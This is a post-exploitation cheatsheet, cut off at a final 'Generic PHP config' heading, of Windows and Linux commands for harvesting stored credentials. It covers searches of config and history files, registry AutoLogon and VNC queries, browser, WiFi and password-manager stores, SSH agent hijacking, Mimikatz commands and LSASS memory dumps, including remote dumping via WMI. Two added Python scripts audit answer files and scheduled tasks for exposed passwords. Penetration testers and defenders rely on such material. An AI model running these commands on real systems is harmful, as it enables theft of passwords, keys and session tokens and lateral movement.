Windows & Linux Credential Hunting - Complete Cheatsheet
🪟 WINDOWS CREDENTIAL HUNTING
File System Credentials
Common Credential Locations
High-Value File Paths
# User directories
dir C:\Users\*\Desktop\*pass*.* /s
dir C:\Users\*\Documents\*pass*.* /s
dir C:\Users\*\Downloads\*pass*.* /s
# Common password files
findstr /si password *.txt *.xml *.config *.cfg *.conf *.ini *.vbs *.js *.asp *.aspx *.php *.jsp
findstr /si pwd *.txt *.xml *.config
findstr /si credential *.txt *.xml *.config
# Specific patterns
dir /s *pass* == *cred* == *vnc* == *.config*
dir /s /b *unattend.xml* *sysprep.xml* *sysprep.inf* *unattended.xml*
# PowerShell history
Get-Content (Get-PSReadlineOption).HistorySavePath
Get-Content C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Command history
doskey /history
# Interesting file extensions
Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.config -File -Recurse -ErrorAction SilentlyContinue
Unattended Installation Files
Windows Deployment Credentials
# Unattend.xml locations
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
# Search for answer files
Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml,autounattend.xml -ErrorAction SilentlyContinue
# Parse for passwords (Base64 encoded in unattend.xml)
$xml = [xml](Get-Content C:\Windows\Panther\unattend.xml)
$xml.unattend.settings.component | Where-Object {$_.UserAccounts} | ForEach-Object {$_.UserAccounts.AdministratorPassword}
# Decode Base64 password: the value is UTF-16LE (not UTF-8) of the password with the literal suffix "Password" appended
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("BASE64_PASSWORD_HERE")) -replace 'Password$'
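The Base64 in an answer file is only obfuscation: it is the UTF-16LE bytes of the password with the literal string "Password" appended. The following Python audit, added here as an example and not part of the original cheatsheet or any Microsoft tool, walks an answer file and reports every embedded account password (obfuscated or cleartext, including domain-join credentials) so the file can be scrubbed; the account names, passwords and sample file are constructed.

```python
"""Audit a Windows answer file (unattend.xml, autounattend.xml, sysprep.xml)
for embedded account passwords. Added example for this cheatsheet, not a
Microsoft tool; the answer file below is constructed.
Encoding rule the check relies on: with <PlainText>false</PlainText> the
<Value> is Base64 of the UTF-16LE bytes of the password with the literal
string "Password" appended, i.e. obfuscation rather than protection."""
import base64
import sys
import xml.etree.ElementTree as ET

# Password-carrying elements: AdministratorPassword, LocalAccount/Password,
# AutoLogon/Password and the domain-join Credentials/Password
PASSWORD_ELEMENTS = {"AdministratorPassword", "Password"}
SUFFIX = "Password"

def _local(tag):
    """Drop the namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]

def encode_answer_file_password(password):
    """Produce the obfuscated form that Windows System Image Manager writes."""
    return base64.b64encode((password + SUFFIX).encode("utf-16-le")).decode("ascii")

def decode_answer_file_password(value, plain_text):
    """Recover the cleartext from a <Value> given its <PlainText> flag."""
    if plain_text:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    return decoded[:-len(SUFFIX)] if decoded.endswith(SUFFIX) else decoded

def _account_name(elem, parents):
    """Work out which account a password element belongs to."""
    if _local(elem.tag) == "AdministratorPassword":
        return "Administrator"
    holder = parents.get(elem)  # LocalAccount, AutoLogon or Credentials
    for sibling in (holder if holder is not None else ()):
        if _local(sibling.tag) in ("Name", "Username"):
            return (sibling.text or "").strip()
    return "<unknown>"

def audit_answer_file(xml_source):
    """One dict per password found: account, element, plaintext flag, decoded password."""
    if isinstance(xml_source, str):
        xml_source = xml_source.encode("utf-8")
    root = ET.fromstring(xml_source)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if _local(elem.tag) not in PASSWORD_ELEMENTS:
            continue
        value, plain = None, True  # assumption: an omitted <PlainText> is treated as cleartext
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plain = (child.text or "").strip().lower() == "true"
        if value is None and len(elem) == 0:  # <Credentials><Password>text</Password> has no <Value>
            value = (elem.text or "").strip()
        if not value:
            continue
        findings.append({"account": _account_name(elem, parents), "element": _local(elem.tag),
                         "plaintext": plain, "password": decode_answer_file_password(value, plain)})
    return findings

# Constructed sample: one obfuscated and three cleartext passwords
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <UserAccounts>
      <AdministratorPassword><Value>QQBiAGMAUABhAHMAcwB3AG8AcgBkAA==</Value><PlainText>false</PlainText></AdministratorPassword>
      <LocalAccounts><LocalAccount wcm:action="add"><Name>deploy</Name><Group>Administrators</Group>
        <Password><Value>Summer2024!</Value><PlainText>true</PlainText></Password></LocalAccount></LocalAccounts>
    </UserAccounts>
    <AutoLogon><Username>deploy</Username><Enabled>true</Enabled>
      <Password><Value>Summer2024!</Value><PlainText>true</PlainText></Password></AutoLogon>
  </component></settings>
  <settings pass="specialize"><component name="Microsoft-Windows-UnattendedJoin">
    <Identification><Credentials><Domain>corp.example</Domain><Username>svc_join</Username>
      <Password>J0in-Me!</Password></Credentials><JoinDomain>corp.example</JoinDomain></Identification>
  </component></settings>
</unattend>
"""

if __name__ == "__main__":
    source = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_UNATTEND
    for f in audit_answer_file(source):  # report where a password lives, not the password itself
        print(f"{f['account']:<14} {f['element']:<22} plaintext={f['plaintext']!s:<5} len={len(f['password'])}")
```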
Configuration Files
Application Configuration Mining
# IIS Configuration
Get-Content C:\inetpub\wwwroot\web.config | Select-String -Pattern "password"
Get-Content C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | Select-String -Pattern "connectionString"
# Apache/XAMPP
Get-Content C:\xampp\apache\conf\httpd.conf
Get-Content C:\xampp\mysql\bin\my.ini
Get-Content C:\xampp\filezilla\FileZilla*.xml
Get-Content C:\xampp\phpMyAdmin\config.inc.php
# Database configs
Get-ChildItem -Path C:\ -Include *.config,*.conf,*.cfg -File -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "connectionString|password|pwd"
# Application specific
Get-Content "C:\Program Files\*\*.config" | Select-String -Pattern "password"
Get-Content "C:\Program Files (x86)\*\*.config" | Select-String -Pattern "password"
Registry Credentials
Auto-Logon Credentials
Registry AutoLogon Passwords
# AutoLogon credentials (plaintext!)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
# Alternative locations
reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon"
# PowerShell method
Get-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Select-Object Default*
Saved Windows Credentials
Registry Credential Storage
# RunAs credentials
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunAs /s
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunAs /s
# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HostName UserName PublicKeyFile PortForwardings"
# WinSCP
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v password
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server" /v Password
# SNMP community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Service Credentials
Service Account Enumeration
# Services with credentials
Get-WmiObject win32_service | Where-Object {$_.StartName -ne "LocalSystem" -and $_.StartName -ne "NT AUTHORITY\LocalService" -and $_.StartName -ne "NT AUTHORITY\NetworkService"} | Select-Object Name, StartName, DisplayName
# Registry service passwords (encrypted)
reg query HKLM\SYSTEM\CurrentControlSet\Services /s /f "ObjectName"
# Specific service checks
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT" /v ObjectName
reg query "HKLM\SYSTEM\CurrentControlSet\Services\MSSQLSERVER" /v ObjectName
# PowerShell detailed
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services\" | ForEach-Object {
$service = $_
$account = (Get-ItemProperty $service.PSPath -Name ObjectName -ErrorAction SilentlyContinue).ObjectName
if ($account -and $account -ne "LocalSystem") {
Write-Output "$($service.PSChildName): $account"
}
}
Credential Manager & DPAPI
Windows Credential Manager
Credential Manager Extraction
# List stored credentials
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
# PowerShell enumeration
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }
# Using rundll32
rundll32.exe keymgr.dll,KRShowKeyMgr
# Detailed credential enumeration
Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Credentials\" -Force
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Credentials\" -Force
# Web credentials
Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Vault\" -Force
# With Mimikatz (if available)
sekurlsa::credman
vault::cred /patch
DPAPI Secrets
DPAPI Blob Hunting
# Find DPAPI master keys
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Protect\*" -Force
Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Protect\*" -Force
# Find credential files
Get-ChildItem -Path "C:\Users\*\AppData\*\Microsoft\Credentials\*" -Force -Recurse
# Chrome passwords (encrypted with DPAPI)
$chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
Copy-Item $chromePath "$env:TEMP\Login Data"
# Edge passwords
$edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear
# PowerShell method for all WiFi passwords
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{SSID=$name;PASSWORD=$pass}}
Database Credentials
SQL Server
SQL Server Credential Hunting
# Find SQL Server instances
Get-Service -Name "*SQL*"
# SQL connection strings in registry
reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server" /s /f connectionstring
# Check SQL Server error logs
Get-Content "C:\Program Files\Microsoft SQL Server\*\MSSQL\LOG\ERRORLOG*" | Select-String -Pattern "password"
# .udl files (Universal Data Link)
Get-ChildItem -Path C:\ -Include *.udl -File -Recurse -ErrorAction SilentlyContinue
# SQL command history
Get-Content "$env:APPDATA\Microsoft\SQL Server Management Studio\*.SqlStudio\*\QueryHistory\*"
Get-Content "$env:APPDATA\Microsoft SQL Server Management Studio\*\SqlStudio\Settings\SQL*"
# SSMS recent connections
Get-Content "$env:APPDATA\Microsoft\SQL Server Management Studio\18.0\UserSettings.xml" | Select-String -Pattern "Connection"
# Check for .sql files with credentials
Get-ChildItem -Path C:\ -Include *.sql -File -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password|pwd"
Other Databases
Database Configuration Files
# MySQL
Get-Content "C:\ProgramData\MySQL\MySQL Server *\my.ini"
Get-Content "C:\Program Files\MySQL\MySQL Server *\my.ini"
# PostgreSQL
Get-Content "C:\Program Files\PostgreSQL\*\data\postgresql.conf"
Get-Content "C:\Program Files\PostgreSQL\*\data\pg_hba.conf"
# MongoDB
Get-Content "C:\Program Files\MongoDB\Server\*\bin\mongod.cfg"
# Oracle
Get-Content "C:\app\oracle\product\*\dbhome_*\NETWORK\ADMIN\tnsnames.ora"
Get-Content "C:\app\oracle\product\*\dbhome_*\NETWORK\ADMIN\sqlnet.ora"
Browser Credentials
Browser Password Stores
Browser Credential Extraction
# Chrome
$chromePath = @(
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Web Data"
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History"
)
# Firefox
Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles\*.default*\" -Include "logins.json","key*.db","cert*.db" -ErrorAction SilentlyContinue
# Edge
$edgePath = @(
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Cookies"
)
# Internet Explorer / Edge Legacy
# Stored in Credential Manager (see above)
# Opera
"$env:APPDATA\Opera Software\Opera Stable\Login Data"
# Brave
"$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default\Login Data"
# Using PowerShell to extract Chrome passwords (requires user context)
Add-Type -AssemblyName System.Security
$chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
$tempPath = "$env:TEMP\chromelogins"
Copy-Item $chromePath $tempPath
# Use SQLite to read (if available)
# Or use tools like SharpChrome, ChromePass
Browser History & Cookies
Session Token Extraction
# Chrome cookies (SQLite database)
$cookiePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Copy-Item $cookiePath "$env:TEMP\cookies.db"
# Firefox cookies
Get-ChildItem "$env:APPDATA\Mozilla\Firefox\Profiles\*.default*\cookies.sqlite"
# Check for saved forms data
$webDataPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Web Data"
# Browser history for credential URLs
$historyPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History"
Email & Communication Clients
Outlook Credentials
Outlook Password Extraction
# Outlook profiles
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook" /s
reg query "HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook" /s
# PST file locations
Get-ChildItem -Path C:\Users\* -Include *.pst,*.ost -Recurse -ErrorAction SilentlyContinue
# Outlook passwords in registry (encrypted)
reg query "HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles" /s /f password
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles" /s /f password
# NK2 autocomplete files (email addresses)
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Outlook\*.NK2"
Other Email Clients
Email Client Configurations
# Thunderbird
Get-ChildItem -Path "$env:APPDATA\Thunderbird\Profiles\*.default*\" -Include "logins.json","key*.db"
# Windows Mail
Get-ChildItem -Path "$env:LOCALAPPDATA\Packages\microsoft.windowscommunicationsapps*\LocalState" -Recurse -Include "*.edb"
# Check for email configuration files
Get-ChildItem -Path C:\ -Include *.pst,*.ost,*.eml,*.msg,*.edb -Recurse -ErrorAction SilentlyContinue
Application-Specific Credentials
Remote Access Tools
Remote Access Credentials
# TeamViewer
reg query "HKLM\SOFTWARE\TeamViewer" /s
reg query "HKCU\SOFTWARE\TeamViewer" /s
# AnyDesk
Get-Content "$env:APPDATA\AnyDesk\*.conf"
Get-Content "$env:PROGRAMDATA\AnyDesk\*.conf"
# RDP files
Get-ChildItem -Path C:\Users\* -Include *.rdp -Recurse -ErrorAction SilentlyContinue
Get-Content C:\Users\*\*.rdp | Select-String -Pattern "username|password"
# RDP saved credentials
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
# VNC
Get-ChildItem -Path "C:\Program Files\RealVNC\VNC Server" -Include *.vnc,*.config
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Remote Desktop Manager
Get-Content "$env:LOCALAPPDATA\Devolutions\RemoteDesktopManager\*.cfg"
Development Tools
Developer Credential Stores
# Git credentials
Get-Content "$env:USERPROFILE\.git-credentials"
Get-Content "$env:USERPROFILE\.gitconfig"
git config --list --show-origin
# Visual Studio
Get-ChildItem -Path "$env:LOCALAPPDATA\Microsoft\VisualStudio\*\Settings\*.vssettings"
Get-Content "$env:APPDATA\Microsoft\VisualStudio\*\*.suo" -ErrorAction SilentlyContinue
# VS Code
Get-Content "$env:APPDATA\Code\User\settings.json"
Get-ChildItem -Path "$env:USERPROFILE\.vscode\extensions" -Include settings.json,config.json -Recurse
# JetBrains IDEs
Get-ChildItem -Path "$env:USERPROFILE\.IntelliJIdea*\config" -Include *.xml -Recurse | Select-String -Pattern "password"
# Docker
Get-Content "$env:USERPROFILE\.docker\config.json"
# Kubernetes
Get-Content "$env:USERPROFILE\.kube\config"
# AWS CLI
Get-Content "$env:USERPROFILE\.aws\credentials"
Get-Content "$env:USERPROFILE\.aws\config"
# Azure CLI
Get-Content "$env:USERPROFILE\.azure\accessTokens.json"
Get-Content "$env:USERPROFILE\.azure\azureProfile.json"
Password Managers
Password Manager Databases
# KeePass
Get-ChildItem -Path C:\ -Include *.kdbx,*.kdb -Recurse -ErrorAction SilentlyContinue
# LastPass
Get-ChildItem -Path "$env:LOCALAPPDATA\LastPass" -Include *.psafe3
# 1Password
Get-ChildItem -Path "$env:LOCALAPPDATA\1Password" -Include *.sqlite,*.opvault
# Dashlane
Get-ChildItem -Path "$env:APPDATA\Dashlane" -Include *.db,*.aes
# Bitwarden
Get-ChildItem -Path "$env:APPDATA\Bitwarden" -Include data.json
# RoboForm
Get-ChildItem -Path "$env:APPDATA\RoboForm\Profiles" -Include *.rfo
Advanced Techniques
Memory Scraping
In-Memory Credential Extraction
# Process memory dump (without Mimikatz)
# Using ProcDump (Microsoft signed)
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Using comsvcs.dll (living off the land)
Get-Process lsass | ForEach-Object {
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $_.Id C:\temp\lsass.dmp full
}
# Task Manager method (GUI)
# Right-click lsass.exe -> Create dump file
# Search process memory for passwords
Get-Process | Where-Object {$_.ProcessName -match "chrome|firefox|outlook|ssms"} | ForEach-Object {
Write-Host "Checking process: $($_.ProcessName)"
# Would need memory reading tool here
}
# WMI for remote dumping
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create -ArgumentList "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full"
Scheduled Tasks & Scripts
Automation Credential Mining
# Scheduled tasks with saved credentials
schtasks /query /xml | Select-String -Pattern "UserId|password"
schtasks /query /fo LIST /v | findstr "User:"
# PowerShell scheduled jobs
Get-ScheduledJob | Get-JobTrigger
# Task XML files
Get-ChildItem -Path "C:\Windows\System32\Tasks" -Recurse -Include *.xml | Select-String -Pattern "password|UserId"
# Startup scripts
Get-ChildItem -Path "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" -Include *.bat,*.cmd,*.ps1
# GPO scripts
Get-ChildItem -Path "C:\Windows\SYSVOL\*" -Include *.xml,*.bat,*.ps1 -Recurse | Select-String -Pattern "password"
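Task definitions record whether a password was stored for the principal (LogonType Password) and can carry secrets in their arguments. As an added example (not from the cheatsheet or Microsoft), this Python audit parses exported task XML and reports both conditions without echoing the secret; the task names, account names and arguments are constructed.

```python
r"""Audit scheduled-task definitions (output of `schtasks /query /xml`, or the
files under C:\Windows\System32\Tasks) for two exposures: a Principal whose
LogonType is Password (a stored credential exists for that task) and a command
line that embeds a secret. Added example for this cheatsheet, not a Microsoft
tool; the two task definitions below are constructed."""
import os
import re
import sys
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# LogonTypes for which Task Scheduler keeps a password on the host
STORED_PASSWORD_LOGON = {"Password", "InteractiveTokenOrPassword"}
# flag name followed by a value, e.g. --password S3cret!  /pwd:abc  token=xyz
SECRET_ARG = re.compile(r"(?i)(?:--?|/)?\b(pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[=: ]\s*(\S+)")

def _text(parent, tag):
    """Text of the first child <tag> of parent, or '' when either is absent."""
    el = parent.find(NS + tag) if parent is not None else None
    return (el.text or "").strip() if el is not None else ""

def audit_task_xml(xml_source):
    """Return [(task_uri, kind, detail)] for one task definition (str or bytes)."""
    if isinstance(xml_source, str):
        xml_source = xml_source.encode("utf-8")
    root = ET.fromstring(xml_source)
    uri = _text(root.find(NS + "RegistrationInfo"), "URI") or "<unnamed>"
    findings = []
    for principal in root.iter(NS + "Principal"):
        logon = _text(principal, "LogonType")
        if logon in STORED_PASSWORD_LOGON:
            run_level = _text(principal, "RunLevel") or "LeastPrivilege"
            findings.append((uri, "stored-password",
                             f"runs as {_text(principal, 'UserId')} with LogonType={logon}, RunLevel={run_level}"))
    for exe in root.iter(NS + "Exec"):
        for m in SECRET_ARG.finditer(_text(exe, "Arguments")):
            # report the flag and the value's length only, never the value
            findings.append((uri, "secret-in-arguments",
                             f"{_text(exe, 'Command')}: {m.group(1)} followed by a {len(m.group(2))}-char value"))
    return findings

def audit_task_folder(folder):
    """Walk a Tasks tree; real task files are UTF-16 with a BOM, which expat handles when given bytes."""
    findings = []
    for dirpath, _, files in os.walk(folder):
        for name in files:
            try:
                with open(os.path.join(dirpath, name), "rb") as fh:
                    findings.extend(audit_task_xml(fh.read()))
            except (OSError, ET.ParseError):
                continue  # unreadable, or not a task definition
    return findings

# Constructed task definitions (raw strings so the backslashes survive)
SAMPLE_STORED_PASSWORD_TASK = r"""<?xml version="1.0" encoding="UTF-8"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Backup\NightlyDbDump</URI></RegistrationInfo>
  <Principals><Principal id="Author">
    <UserId>CORP\svc_backup</UserId><LogonType>Password</LogonType><RunLevel>HighestAvailable</RunLevel>
  </Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Tools\dbdump.exe</Command>
    <Arguments>--server sql01 --user sa --password S3cret!</Arguments>
  </Exec></Actions>
</Task>
"""
SAMPLE_S4U_TASK = r"""<?xml version="1.0" encoding="UTF-8"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Maintenance\CleanTemp</URI></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>CORP\svc_clean</UserId><LogonType>S4U</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>cmd.exe</Command><Arguments>/c del /q C:\Temp\*.tmp</Arguments></Exec></Actions>
</Task>
"""

if __name__ == "__main__":
    found = audit_task_folder(sys.argv[1]) if len(sys.argv) > 1 else audit_task_xml(SAMPLE_STORED_PASSWORD_TASK)
    for uri, kind, detail in found:
        print(f"{uri}: {kind}: {detail}")
```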
LINUX CREDENTIAL HUNTING
File System Credentials
Common Credential Locations
Linux High-Value Paths
# Search for passwords in common locations
grep -r "password" /home/* 2>/dev/null
grep -r "passwd" /home/* 2>/dev/null
grep -r "pwd" /home/* 2>/dev/null
find / -name "*pass*" 2>/dev/null
# Specific file patterns
find / -type f \( -name "*.txt" -o -name "*.cfg" -o -name "*.conf" -o -name "*.config" -o -name "*.ini" \) -exec grep -l password {} \; 2>/dev/null
# History files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.psql_history
cat ~/.redis_history
cat /home/*/.bash_history
# Hidden files with credentials
find /home -name ".*" -type f -exec grep -l password {} \; 2>/dev/null
# Backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | xargs grep -l password 2>/dev/null
# Log files
grep -r "password" /var/log/* 2>/dev/null
grep -r "pwd" /var/log/* 2>/dev/null
# Temporary files
ls -la /tmp /var/tmp /dev/shm
find /tmp -type f -exec grep -l password {} \; 2>/dev/null
Shell Configuration Files
Shell RC Files & Environment
# Bash configuration
cat ~/.bashrc
cat ~/.bash_profile
cat ~/.profile
cat /etc/profile
# Check all users
for user in $(cut -d: -f1 /etc/passwd); do
echo "=== $user ==="
[ -f /home/$user/.bashrc ] && grep -E "export.*PASS|export.*KEY|export.*TOKEN" /home/$user/.bashrc
[ -f /home/$user/.profile ] && grep -E "PASS|KEY|TOKEN" /home/$user/.profile
done
# Environment variables
env | grep -i pass
env | grep -i key
env | grep -i token
set | grep -i pass
# Aliases might contain passwords
alias
# Functions in shell
declare -f | grep -i pass
SSH Credentials
SSH Keys & Configuration
SSH Key Discovery
# Find SSH keys
find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null
# SSH directories
ls -la ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/authorized_keys
cat ~/.ssh/known_hosts
cat ~/.ssh/config
# All users' SSH keys
for user in $(cut -d: -f1 /etc/passwd); do
[ -d /home/$user/.ssh ] && echo "=== $user SSH ===" && ls -la /home/$user/.ssh/
done
# SSH agent
ssh-add -l
# Check for SSH key passphrases in files
grep -r "BEGIN RSA PRIVATE KEY" /home 2>/dev/null
grep -r "BEGIN OPENSSH PRIVATE KEY" /home 2>/dev/null
# SSH config for saved connections
cat /etc/ssh/ssh_config
grep -r "Host " ~/.ssh/config 2>/dev/null
SSH Session Hijacking
Active SSH Session Abuse
# Find SSH agent sockets
find /tmp -type s -name "agent.*" 2>/dev/null
ls -la /tmp/ssh-*
# List SSH connections
netstat -tnpa | grep ':22'
ss -tnpa | grep ':22'
lsof -i :22
# Check for SSH multiplexing sockets
find ~/.ssh -name "*master*" 2>/dev/null
ls -la ~/.ssh/controlmaster/
# Hijack SSH agent
export SSH_AUTH_SOCK=/tmp/ssh-XXX/agent.XXX
ssh-add -l
Database Credentials
MySQL/MariaDB
MySQL Credential Hunting
# MySQL configuration files
cat /etc/mysql/my.cnf
cat /etc/mysql/mysql.conf.d/*.cnf
cat /etc/mysql/mariadb.conf.d/*.cnf
cat ~/.my.cnf
cat /root/.my.cnf
# MySQL history
cat ~/.mysql_history
cat /root/.mysql_history
# Debian maintenance account
cat /etc/mysql/debian.cnf
# Search for MySQL passwords
grep -r "password" /etc/mysql/ 2>/dev/null
grep -r "mysql" /var/www/ 2>/dev/null | grep -i pass
# Check running MySQL process
ps aux | grep mysql
cat /proc/$(pidof mysqld)/cmdline
# MySQL data directory
ls -la /var/lib/mysql/
# Application configs with DB passwords
find /var/www -name "*.php" -exec grep -l "mysql_connect\|mysqli_connect\|new PDO" {} \;
PostgreSQL
PostgreSQL Credentials
# PostgreSQL config
cat /etc/postgresql/*/main/postgresql.conf
cat /etc/postgresql/*/main/pg_hba.conf
# User password file
cat ~/.pgpass
cat /root/.pgpass
cat /var/lib/postgresql/.pgpass
# PostgreSQL history
cat ~/.psql_history
cat /var/lib/postgresql/.psql_history
# Environment variables
echo $PGPASSWORD
echo $PGUSER
# Search for connection strings
grep -r "postgresql://" /var/www/ 2>/dev/null
grep -r "psql" /home/* 2>/dev/null | grep -i pass
Redis/MongoDB/Other NoSQL
NoSQL Credentials
# Redis
cat /etc/redis/redis.conf | grep -i requirepass
cat /etc/redis/redis.conf | grep -i masterauth
cat ~/.rediscli_history
# MongoDB
cat /etc/mongod.conf
cat /etc/mongodb.conf
grep -i "mongodb://" /var/www/* -r 2>/dev/null
# CouchDB
cat /etc/couchdb/local.ini
cat /opt/couchdb/etc/local.ini
# Elasticsearch
cat /etc/elasticsearch/elasticsearch.yml
Web Server Credentials
Apache
Apache Configuration Mining
# Apache config files
cat /etc/apache2/apache2.conf
cat /etc/httpd/conf/httpd.conf
grep -r "Password" /etc/apache2/ 2>/dev/null
grep -r "Password" /etc/httpd/ 2>/dev/null
# .htaccess and .htpasswd files
find /var/www -name ".htpasswd" -o -name ".htaccess" 2>/dev/null
find /var/www -name ".htpasswd" -exec cat {} \; 2>/dev/null
# Apache environment variables
cat /etc/apache2/envvars
# Virtual hosts
cat /etc/apache2/sites-available/*
cat /etc/httpd/conf.d/*
# Apache logs for passwords
grep -i "password" /var/log/apache2/*.log 2>/dev/null
grep -i "pwd" /var/log/httpd/*.log 2>/dev/null
Nginx
Nginx Credential Discovery
# Nginx config
cat /etc/nginx/nginx.conf
grep -r "password" /etc/nginx/ 2>/dev/null
# Site configurations
cat /etc/nginx/sites-available/*
cat /etc/nginx/conf.d/*
# Basic auth files
find /etc/nginx -name "*.passwd" 2>/dev/null
find /etc/nginx -name "*.users" 2>/dev/null
# Proxy configurations (may contain upstream passwords)
grep -r "proxy_set_header" /etc/nginx/ | grep -i auth
PHP/Web Applications
Web Application Credentials
# WordPress
find /var/www -name "wp-config.php" -exec grep -H "DB_PASSWORD\|DB_USER" {} \; 2>/dev/null
# Drupal
find /var/www -name "settings.php" -exec grep -H "database\|password" {} \; 2>/dev/null
# Joomla
find /var/www -name "configuration.php" -exec grep -H "password\|user" {} \; 2>/dev/null
# Laravel
find /var/www -name ".env" -exec cat {} \; 2>/dev/null
# Generic PHP config
